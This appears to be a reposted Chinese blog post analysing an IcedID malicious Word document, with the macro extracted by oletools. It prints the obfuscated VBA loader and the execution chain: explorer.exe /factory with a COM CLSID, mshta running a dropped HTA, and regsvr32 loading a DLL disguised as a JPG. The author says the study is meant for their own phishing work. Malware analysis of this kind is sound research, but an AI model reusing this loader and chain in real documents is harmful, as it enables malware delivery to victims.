标签:Function IcedID exe End hta 剖析 文档 https com
析
利用oletools静态分析,提取宏代码,如图:
Function contents()
With ActiveDocument.Content.Find
loveDoor = .Execute(FindText:="%1", ReplaceWith:="", Replace:=2)
End With
End Function
Function text1(powGirlLoad)
text1 = ActiveDocument.BuiltInDocumentProperties(powGirlLoad).Value
contents
End Function
Public Function s(dowGirlLoad, tubeGirlPow)
GetObject("", text1("category")).exec StrReverse(" rerolpxe\swodniw\:c") + tubeGirlPow
End Function
文档内容肉眼看上去是空白的,但是全选拖出来如下:
通过宏代码处理文档内容,得到hta文件:
另启动一个 Explorer.exe(防止崩溃影响程序活动)后台隐藏插入com功能组件,方便dll执行的同时调用mshta.exe执行hta文件
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding //有无逗号,区别很好,自行测试
"C:\Windows\System32\mshta.exe" "C:\Users\admin\Documents\karolYouYou.hta"
下载含payload的jpg文件(实质上是dll文件),执行payload
"C:\Windows\System32\regsvr32.exe" c:\users\public\youYou.jpg
样本:
https://app.any.run/tasks/add39d8b-342c-4e55-9b37-3e3379fce030/
参考资料:
https://www.cnblogs.com/liaocheng/p/4506406.html
https://www.cnblogs.com/yx-zs/p/14338291.html
https://zho.bizadcharityrun.com/434451-explorer-exe-starts-every-five-WQFOTF-article
https://blog.csdn.net/userpass_word/article/details/84307126
https://blog.csdn.net/weixin_44493841/article/details/106645360
ps:萌新分析APT攻击手法,用于自身钓鱼作业,请大佬轻喷,欢迎各位蓝队专家评论指点 QAQ
标签:Function,IcedID,exe,End,hta,剖析,文档,https,com 来源: https://www.cnblogs.com/H4ck3R-XiX/p/15703679.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。